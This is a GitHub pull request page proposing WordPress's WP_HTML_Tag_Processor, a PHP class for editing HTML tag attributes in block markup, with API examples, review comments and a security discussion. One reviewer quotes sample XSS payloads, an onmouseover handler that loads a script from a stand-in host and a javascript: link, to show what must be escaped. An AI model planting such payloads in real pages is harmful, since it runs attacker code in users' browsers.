Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

WP_HTML_Tag_Processor: Inject dynamic data to block HTML markup in PHP #42485

Merged
merged 40 commits into from
Sep 23, 2022

Conversation

adamziel
Copy link
Contributor

@adamziel adamziel commented Jul 17, 2022

Description

Introduces WP_HTML_Tag_Processor: A PHP class to update HTML markup (overview issue).

Dynamic blocks often need to inject a CSS class name or set <img src /> in the rendered block HTML markup but lack the means to do so:

At the moment, every block comes up with a custom-tailored regular expression. It is limiting, error-prone, and demands code duplication. It also leads to PRs such as strip whitespaces in render_block_core_cover.

Here's just a few instances where this would be useful:

This PR reuses a lot of the great @dmsnell's explorations from #42507.

Architecture explained

WP_HTML_Tag_Processor provides a standard and highly-restricted HTML modification API. It tokenizes an HTML document to find specific tags. Then, it transforms those tags by adding, removing, or updating the values of the HTML attributes within that tag (opener). Importantly, it does not fully parse HTML or recurse into the HTML structure. Instead, WP_HTML_Tag_Processor moves forward linearly through a document and only parses the HTML tag openers.

In practical terms this API purposefully tries to address only the subset of HTML modifications that are commonly needed when modifying stored HTML from server-side filters and code, such as when adding class names to block markup.

The most significant benefits of the approach taken:

  1. WP_HTML_Tag_Processor works fast and has a tiny memory footprint (for a PHP program). Adding a class and an attribute to 300k tags in a 12MB HTML document takes ~800ms and 24 MB of memory on my Mac Pro.
  2. API is simple and open for further extension.
  3. It covers the most common repeating use cases that we see in the Gutenberg project.

The following constraints were applied to satisfy all of the above:

  1. WP_HTML_Tag_Processor doesn't try to understand the relationship between tags. This prevents us from extrapolating into more complex queries on the HTML structure. This is a perk because it allows us to avoid handling all the complexity and overhead of semantic HTML parsing (as needed when building a DOM tree).
  2. Tags can be matched by tag name, class name, and/or the match offset.
  3. It is possible to set new attributes and update or remove existing attributes. You cannot change the content/markup inside the HTML tag. Recursing into the markup (such as the HTML inside a <p> tag) would require more overhead in the parser and would require handling the array of situations where we find malformed HTML, such as with unmatched or overlapping tags).

Feedback request

Please reply to this PR with your thoughts about:

  • Adding WP_HTML_Tag_Processor to core
  • The public API proposed in this PR

Please ignore the failing CI checks, missing docstrings, and implementation details for now.

Can this really parse HTML like a browser?

This PR includes an HTML tokenizer and an HTML tag parser. It doesn't build a DOM tree, reason about entities, or handle mismatched, overlapping, or malformed tags.

The walker linearly scans the input HTML and visits every tag opener (e.g. <p> or <div class="wp-block-group">). By implementing the WHATWG HTML parsing spec we maintain parity with how browsers will parse the HTML, both in how they decode normal HTML as well as how they handle abnormalities, such as with unexpected HTML attributes like <div =5 title="<br />" a="yes"b=no>

The public API proposed in this PR

Here's what an interface would look like:

interface WP_HTML_Tag_Processor {

	/**
	 * @param $html HTML to process.
	 */
	public function __construct( string $html );

	/**
	 * Finds the next tag matching the $query.
	 * @return Whether a tag was matched.
	 */
	public function next_tag( ?array $query = null ) : bool;

	/**
	 * Updates or creates a new attribute on the currently matched tag.
	 *
	 * @param $name The attribute name to target.
	 * @param $value The new attribute value.
	 */
	public function set_attribute( string $name, string|boolean $value ) : void;

	/**
	 * Removes an attribute of the currently matched tag.
	 *
	 * @param $name The attribute name to remove.
	 */
	public function remove_attribute( string $name ) : void;

	/**
	 * Adds a new class name to the currently matched tag.
	 *
	 * @param $class_name The class name to add.
	 */
	public function add_class( string $class_name )  : void;

	/**
	 * Removes a class name from the currently matched tag.
	 *
	 * @param $class_name The class name to remove.
	 */
	public function remove_class( string $class_name ) : void;

	/**
	 * Returns the updated HTML document.
	 */
	public function __toString() : string;

}

Usage examples

Setting an attribute:

$w = new WP_HTML_Tag_Processor('<div id="first"><img /></div>');
$w->next_tag('img');
$w->set_attribute('src', '/wp-content/logo.png');
echo $w;
// <div id="first"><img src="/wp-content/logo.png" /></div>

Updating multiple tags:

$html = <<<HTML
<div class="main with-border" id="first">
    <span class="not-main bold with-border" id="second">
        Text
    </span>
</div>
HTML;
$w = new WP_HTML_Tag_Processor( $html );
$w->next_tag();
$w->remove_class( 'main' );
$w->remove_class( 'with-border' );
$w->set_attribute( 'id', 'second' );
$w->set_attribute( 'data-foo', 'bar' );
$w->next_tag();
$w->remove_attribute( 'class' );
echo $w;
/*
<div data-foo="bar"  id="second">
    <span  id="second">
        Text
    </span>
</div>
*/

Finding a div with a specific class name:

$w = new WP_HTML_Tag_Processor('<div id="first"><img /><div class="BtnGroup"></div></div>');
$w->next_tag(
	array(
		'tag_name'   => 'div',
		'class_name' => 'BtnGroup',
	)
);

No match found:

$w = new WP_HTML_Tag_Processor('<div id="first"><img /></div>');
$w->next_tag('span'); // There's no span
$w->set_attribute('id', 'first');
$w->next_tag('img');
$w->set_attribute('src', '/wp-content/logo.png');
echo $w;

// Nothing has changed – the parser only moves forward and it reached
// the end after trying to match span:
// <div id="first"><img /></div>

Updating every tag:

while ( $w->next_tag() ) {
    $w->set_attribute( 'data-foo', 'bar' );
}

Alternative ideas considered

Using DOMDocument was extensively discussed – it's not installed on every host so you'd have to provide a polyfill. Even if it was available everywhere, it's based on libxml2 designed to parse XML. Libxml2 does not implement the WHATWG HTML parsing spec and does not support HTML5.

Ad-hoc per-use-case regular expressions were also discussed and explored. It is hard to come up with a correct one and it's easy to run into problems like worrying about the specific sequence of whitespace used in the markup. They're also a maintenance and duplication burden and prone to errors.

Alternative API shapes considered

There was an attempt at a fluid iterface:

$w
   ->next_tag('img')
   ->set_attribute('src', get_thumbnail())
   ->next_tag('span')
   ->add_class('has_thumbnail');

But the streaming nature of this code made it inconvenient. This class must communicate whether it matched a tag and there are two ways to do it:

// We could return false from the `next_tag`, breaking the fluid interface
$w->next_tag() === false;
$w->next_tag()->set_attribute(); // Fatal error

// Or we could add a has_match() method, making it harder to update
// all matches:
while( $w->next_tag() && $w->has_match() {
   // ...
}

In the end, @dmsnell, @gziolo, and I realized that a fluid interface is about as verbose as the lack of it:

$w->next_tag('img');
$w->set_attribute('src', get_thumbnail());
$w->next_tag('span');
$w->add_class('has_thumbnail');

Since the latter makes for a simpler code, it became the version included in this proposal.

Security implications

Outputting a malformed HTML would create an XSS attack vector so we better test for all kinds of corner cases, e.g. using the same test examples as KSES.

To stay safe, the API is restricted to adding, removing, and replacing HTML attributes in tag openers. We know where they start and end by following the HTML parsing specification to the letter. This API processes the data in a linear fashion and does not recurse or reason about the tree structure at all. It can inject a string like id="$escaped_id_value" after a tag start, but it cannot do anything else like change the content or create new tags.

In my testing, this PR handles weird inputs in the same way a browser would. Still, we need an extensive test suite to be extra sure about that.

It is also worth noting that a typical input to WP_HTML_Tag_Processor will have been already filtered through KSES.

Related resources

Testing

Run unit tests with:

npm run test-unit-php -- --group html

# Or without docker:
 ./vendor/bin/phpunit --no-configuration ./phpunit/html/wp-html-tag-processor-test.php

Next steps

  • Consider disallowing on* attributes such as onClick. As @peterwilsoncc mentioned:

A nagging concern I have is that such a feature would make it easier for code to be added without regard for the unfiltered_html permission. A third party developer could add a JavaScriptEvent property allowing users to add script tags without kses recognizing them as such.

@dmsnell
Copy link
Member

dmsnell commented Jul 18, 2022

do you think we really need the updater function for set_attribute? I suspect providing a string value should be quite useful on its own, and adding the function updater will certainly encourage behaviors we may not want, such as the example here where we create a new closure just to return a static string value (though I'm also thinking more about cases like people doing ->set_attribute('class', function( $class ) { return $class . ' another-class'; } )

@adamziel
Copy link
Contributor Author

do you think we really need the updater function for set_attribute?

It's either this or a more sophisticated behavior for remove_class/add_class to support multiple class updates for the same element. I think you have a point so I'll play with the latter.

@adamziel
Copy link
Contributor Author

adamziel commented Jul 20, 2022

@dmsnell @gziolo I updated this quite a bit! Test, docs, code standards are still missing. On the up side I made it more internally consistent, simplified a bunch of code paths, limited the available public methods, and added a fresh usage example with a more involved HTML snippet at the bottom of the file. This one is ready for more in-depth comments now.

@gziolo gziolo added the [Type] Technical Prototype Offers a technical exploration into an idea as an example of what's possible label Jul 21, 2022
@gziolo
Copy link
Member

gziolo commented Jul 21, 2022

I have some general feedback to share. I checked existing issues and tickets related to HTML scanning in PHP for block attributes stored as block content – aka sourced attributes. In the past, it was primarily discussed in relation to REST API so you could get the block data as part of the post content object. The original issue is #4763 which I moved to WordPress Trac at some point ticket#53603. Two existing implementations try a different approach to scanning the HTML of the block, which you might find interesting:

  1. Prototype: Server-side block attributes sourcing #18414 (by Andrew Duthie)

    the parsing relies on DOMDocument, querying using DOMXPath by first converting the block type attribute selector to an equivalent XPath selector using a bundled, modified version of a third-party library PHP Selector.

  2. wp-rest-blocks plugin (by Jonny Harris)

    In my plugin, I used a library called pQuery, as a way to use CSS selectors in PHP. Whatever goes into core, may want to use a different approach.

The most complex attributes sourcing in core blocks is probably used with the Table block:

"caption": {
"type": "string",
"source": "html",
"selector": "figcaption",
"default": ""
},
"head": {
"type": "array",
"default": [],
"source": "query",
"selector": "thead tr",
"query": {
"cells": {
"type": "array",
"default": [],
"source": "query",
"selector": "td,th",
"query": {
"content": {
"type": "string",
"source": "html"
},
"tag": {
"type": "string",
"default": "td",
"source": "tag"
},
"scope": {
"type": "string",
"source": "attribute",
"attribute": "scope"
},
"align": {
"type": "string",
"source": "attribute",
"attribute": "data-align"
}
}
}
}
},
"body": {
"type": "array",
"default": [],
"source": "query",
"selector": "tbody tr",
"query": {
"cells": {
"type": "array",
"default": [],
"source": "query",
"selector": "td,th",
"query": {
"content": {
"type": "string",
"source": "html"
},
"tag": {
"type": "string",
"default": "td",
"source": "tag"
},
"scope": {
"type": "string",
"source": "attribute",
"attribute": "scope"
},
"align": {
"type": "string",
"source": "attribute",
"attribute": "data-align"
}
}
}
}
},
"foot": {
"type": "array",
"default": [],
"source": "query",
"selector": "tfoot tr",
"query": {
"cells": {
"type": "array",
"default": [],
"source": "query",
"selector": "td,th",
"query": {
"content": {
"type": "string",
"source": "html"
},
"tag": {
"type": "string",
"default": "td",
"source": "tag"
},
"scope": {
"type": "string",
"source": "attribute",
"attribute": "scope"
},
"align": {
"type": "string",
"source": "attribute",
"attribute": "data-align"
}
}
}
}
}

I don’t know if that’s something you considered when discussing HTML processing on the server, but it feels very close despite being on a completely different level of abstraction.


I checked the current implementation, and it looks like the WP_HTML_Updater is way much simpler than the solutions I mentioned above. I don't think it would be possible to reuse it in the current form for attribute sourcing because it only finds HTML tags as a flat list, and therefore it doesn't do any analysis of the relations between nodes. Is the goal to keep the API very limited in the long run? I'm genuinely curious how you see this API, so we have a mutual understanding of where exactly this class would be applicable.

lib/experimental/class-wp-html-updater.php Outdated Show resolved Hide resolved
lib/experimental/class-wp-html-updater.php Outdated Show resolved Hide resolved
lib/experimental/class-wp-html-updater.php Outdated Show resolved Hide resolved
lib/experimental/class-wp-html-updater.php Outdated Show resolved Hide resolved
lib/experimental/class-wp-html-updater.php Outdated Show resolved Hide resolved
@adamziel
Copy link
Contributor Author

The most complex attributes sourcing in core blocks is probably used with the Table block:
I checked the current implementation, and it looks like the WP_HTML_Updater is way much simpler than the solutions I mentioned above. I don't think it would be possible to reuse it in the current form for attribute sourcing because it only finds HTML tags as a flat list, and therefore it doesn't do any analysis of the relations between nodes. Is the goal to keep the API very limited in the long run? I'm genuinely curious how you see this API, so we have a mutual understanding of where exactly this class would be applicable.

@gziolo Two pieces are missing for us to be able to do that:

  • Tracking the current tree path
  • Parsing CSS selectors

Perhaps it wouldn't be too hard to add both in one of the future iterations.

@adamziel adamziel changed the title HTML updater WP_HTML_Walker: Dynamically update block markup HTML attributes in PHP Jul 26, 2022
@adamziel adamziel changed the title WP_HTML_Walker: Dynamically update block markup HTML attributes in PHP WP_HTML_Walker: Inject dynamic data to block HTML markup in PHP Jul 26, 2022
@adamziel adamziel self-assigned this Jul 26, 2022
lib/experimental/class-wp-html-walker-test.php Outdated Show resolved Hide resolved
lib/experimental/class-wp-html-walker-test.php Outdated Show resolved Hide resolved
lib/experimental/class-wp-html-walker-test.php Outdated Show resolved Hide resolved
lib/experimental/class-wp-html-walker-test.php Outdated Show resolved Hide resolved
@adamziel adamziel force-pushed the add/html-tokenizer-2 branch 3 times, most recently from f6ef968 to 5bf0c28 Compare July 27, 2022 13:43
@adamziel adamziel added the [Feature] Blocks Overall functionality of blocks label Jul 27, 2022
@adamziel adamziel marked this pull request as ready for review July 28, 2022 10:42
@adamziel adamziel requested a review from spacedmonkey as a code owner July 28, 2022 10:42
@adamziel
Copy link
Contributor Author

adamziel commented Jul 28, 2022

This PR needs your feedback to progress!

It proposes a lean HTML processor for PHP:

$w = new WP_HTML_Walker('<div id="first"><img /></div>');
$w->next_tag('img');
$w->set_attribute('src', '/wp-content/logo.png');
echo $w;
// <div id="first"><img src="/wp-content/logo.png" /></div>

It will be a tremendous help for working with blocks in PHP. See the description for more details and use-cases.

The only way to move forward now is to discuss the proposed public interface and the idea itself. Please comment with your thoughts on both!

@dmsnell @spacedmonkey @aristath @schlessera @fabiankaegy @carolinan @ntsekouras @gziolo @scruffian @draganescu @getdave @swissspidy @azaozz @hellofromtonya @peterwilsoncc @youknowriad @mcsf @ellatrix @Mamaduka @noisysocks @mtias @youknowriad @andronocean @ciampo @aaronrobertshaw @c4rl0sbr4v0 @jorgefilipecosta @paaljoachim @talldan @oandregal @ntsekouras @ndiego @MaggieCabrera @sarayourfriend @ajlende

@swissspidy
Copy link
Member

Is there more background about the design of this API and why it is needed? What other alternatives have been considered? What about the security implications of writing your own HTML modifier like this?

If the primary use case of this is HTML modifications in blocks, why does (a tiny wrapper around) DOMDocument / DOMDocumentFragment not suffice?


Aside: Instead of pinging dozens of people I'd suggest bringing this up in dev chat and writing a make/core post to get more feedback :)

@adamziel
Copy link
Contributor Author

adamziel commented Jul 28, 2022

Is there more background about the design of this API and why it is needed?

@swissspidy Here's just a few instances where this would be useful:

What other alternatives have been considered?

Using DOMDocument was extensively discussed – it's not installed on every host so you'd have to provide a polyfill. Even if it was available everywhere, it can't match and modify imperfect HTML that well.

Ad-hoc per-use-case regular expressions were also discussed and explored. It is hard to come up with a correct one and it's easy to run into problems like worrying about the specific sequence of whitespace used in the markup. They're also a maintenance and duplication burden and prone to errors.

What about the security implications of writing your own HTML modifier like this?

Outputting a malformed HTML would create an XSS attack vector so we better test for all kinds of corner cases, e.g. using the same test examples as KSES.

To stay safe, the API is restricted to adding, removing, and replacing HTML attributes. We know where they start and end by following the HTML parsing specification to the letter. This API can inject a string like id="$escaped_id_value" after a tag start, but it cannot change tag’s text or html content or create new tags.

In my testing, this PR handles weird inputs in the same way a browser would. Still, we need an extensive test suite to be extra sure about that.

It is also worth noting that a typical input to WP_HTML_Walker will have been already filtered through KSES.

@gziolo
Copy link
Member

gziolo commented Sep 23, 2022

@adamziel opened #44410 to track follow-up issues as we plan to land this PR in its current shape as soon as CI becomes green. We have been working on this task for over two months and got a ton of great feedback here and in https://make.wordpress.org/core/2022/08/19/a-new-system-for-simply-and-reliably-updating-html-attributes/ that helped to shape the current solution. The plan now is to include this code in the Gutenberg plugin that's going to be included in 14.3 release (in 3 weeks) with the intent to ship it in WordPress 6.2 (Q1 of the next year).

@gziolo gziolo requested a review from azaozz September 23, 2022 06:05
@adamziel adamziel merged commit c6c5dbb into trunk Sep 23, 2022
@adamziel adamziel deleted the add/html-tokenizer-2 branch September 23, 2022 06:36
@github-actions github-actions bot added this to the Gutenberg 14.3 milestone Sep 23, 2022
@gziolo gziolo added [Type] New API New API to be used by plugin developers or package users. Needs Dev Note Requires a developer note for a major WordPress release cycle [Feature] Block API API that allows to express the block paradigm. and removed [Type] Technical Prototype Offers a technical exploration into an idea as an example of what's possible labels Sep 23, 2022
@getdave
Copy link
Contributor

getdave commented Sep 23, 2022

Props to everyone who worked so hard to land this one 👏

@azaozz
Copy link
Contributor

azaozz commented Sep 23, 2022

As I commented a month ago (in a comment that GH very unhelpfully hides) this is not ready for "prime time" yet. It's lacking clarity and documentation about what security features this new API has or doesn't have. Imho this is a blocker.

There are several @TODO that still await a decision and implementation. Most are for security features. Some are mentioned in #44410 others (like valid attribute names) are not.

From what I understand it looks like this new API is going to require extenders to properly escape all new and replacement strings. If that's the case, there at least should be a sufficient section in the docblock(s) explaining what and how to do that, and perhaps mentioning the "danger zone" / edge cases. These sections will also need examples of how exceptions should e handled, strings like onmouseover="document.write('<script src=\'https://bad-code.com/1.js\'></script>')" and perhaps stuff like href="javascript://alert(1)".

@bph bph mentioned this pull request Oct 3, 2022
89 tasks
dmsnell added a commit to dmsnell/wordpress-develop that referenced this pull request Jan 26, 2023
This commit pulls in the HTML Tag Processor from the Gutenbeg repository.
The Tag Processor attempts to be an HTML5-spec-compliant parser that
provides the ability in PHP to find specific HTML tags and then add,
remove, or update attributes on that tag. It provides a safe and reliable
way to modify the attribute on HTML tags.

```php
// Add missing `rel` attribute to links.
$p = new WP_HTML_Tag_Processor( $block_content );
if ( $p->next_tag( 'A' ) && empty( $p->get_attribute( 'rel' ) ) ) {
    $p->set_attribute( 'noopener nofollow' );
}
return $p->get_updated_html();
```

Introduced originally in WordPress/gutenberg#42485 and developed within
the Gutenberg repository, this HTML parsing system was built in order
to address a persistent need (properly modifying HTML tag attributes)
and was motivated after a sequence of block editor defects which stemmed
from mismatches between actual HTML code and expectectations for HTML
input running through existing naive string-search-based solutions.

The Tag Processor is intended to operate fast enough to avoid being an
obstacle on page render while using as little memory overhead as possible.
It is practically a zero-memory-overhead system, and only allocates memory
as changes to the input HTML document are enqueued, releasing that memory
when flushing those changes to the document, moving on to find the next
tag, or flushing its entire output via `get_updated_html()`.

Rigor has been taken to ensure that the Tag Processor will not be consfused
by unexpected or non-normative HTML input, including issues arising from
quoting, from different syntax rules within `<title>`, `<textarea>`, and
`<script>` tags, from the appearance of rare but legitimate comment and
XML-like regions, and from a variety of syntax abnormalities such as
unbalanced tags, incomplete syntax, and overlapping tags.

The Tag Processor is constrained to parsing an HTML document as a stream
of tokens. It will not build an HTML tree or generate a DOM representation
of a document. It is designed to start at the beginning of an HTML
document and linearly scan through it, potentially modifying that document
as it scans. It has no access to the markup inside or around tags and it
has no ability to determine which tag openers and tag closers belong to each
other, or determine the nesting depth of a given tag.

It includes a primitive bookmarking system to remember tags it has previously
visited. These bookmarks refer to specific tags, not to string offsets, and
continue to point to the same place in the document as edits are applied. By
asking the Tag Processor to seek to a given bookmark it's possible to back
up and continue processsing again content that has already been traversed.

Attribute values are sanitized with `esc_attr()` and rendered as double-quoted
attributes. On read they are unescaped and unquoted. Authors wishing to rely on
the Tag Processor therefore are free to pass around data as normal strings.

Convenience methods for adding and removing CSS class names exist in order to
remove the need to process the `class` attribute.

```php
// Update heading block class names
$p = new WP_HTML_Tag_Processor( $html );
while ( $p->next_tag() ) {
    switch ( $p->get_tag() ) {
	case 'H1':
	case 'H2':
	case 'H3':
	case 'H4':
	case 'H5':
	case 'H6':
	    $p->remove_class( 'wp-heading' );
	    $p->add_class( 'wp-block-heading' );
	    break;
}
return $p->get_updated_html();
```

The Tag Processor is intended to be a reliable low-level library for traversing
HTML documents and higher-level APIs are to be built upon it. Immediately, and
in Core Gutenberg blocks it is meant to replace HTML modification that currently
relies on RegExp patterns and simpler string replacements.

See the following for examples of such replacement:
    WordPress/gutenberg@1315784
    https://github.com/WordPress/gutenberg/pull/45469/files#diff-dcd9e1f9b87ca63efe9f1e834b4d3048778d3eca41aa39c636f8b16a5bb452d2L46
    WordPress/gutenberg#46625

Co-Authored-By: Adam Zielinski <[email protected]>
Co-Authored-By: Bernie Reiter <[email protected]>
Co-Authored-By: Grzegorz Ziolkowski <[email protected]>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
[Feature] Block API API that allows to express the block paradigm. [Feature] Blocks Overall functionality of blocks Needs Dev Note Requires a developer note for a major WordPress release cycle [Type] New API New API to be used by plugin developers or package users.
Projects
None yet
Development

Successfully merging this pull request may close these issues.